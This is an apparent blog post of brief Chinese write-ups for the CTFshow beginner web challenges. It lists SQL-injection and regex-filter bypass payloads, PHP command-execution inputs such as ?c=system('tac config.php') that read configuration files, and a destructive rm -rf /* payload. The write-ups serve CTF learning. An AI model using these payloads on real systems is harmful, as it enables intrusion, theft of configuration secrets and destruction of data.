CTFshow Web夺旗之路

萌新:web1利用逻辑运算符or连接,同时传递两个参数,例如:?id=1 or id =1000,1完成绕过,1000输出结果。

           web2利用sql语句中可运算的特性,绕过函数preg_match()例如:2*500

           web3利用双引号绕过正则表达,例如:“1000” 

           web4利用单引号绕过正则表达,例如:‘1000’

           web5利用取反“~”进行绕过,双取反:~~1000

           web6利用取反“~”进行绕过,双取反:~~1000

           web7利用二进制绕过:0b1111101000。其中0b为二进制数前缀

           web8删库获取flag,推测系统为linux,命令为rm -rf /*,构造payload:flag=rm -rf /*

           web9正则表达匹配括号内的还包含php提供4种方法执行系统外部命令:exec()、passthru()、system()、 shell_exec()。实例:?c=system('tac config.php');

           web10另外的执行命令show_souce()?c=show_source('config.php');

没意思跳过萌新。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值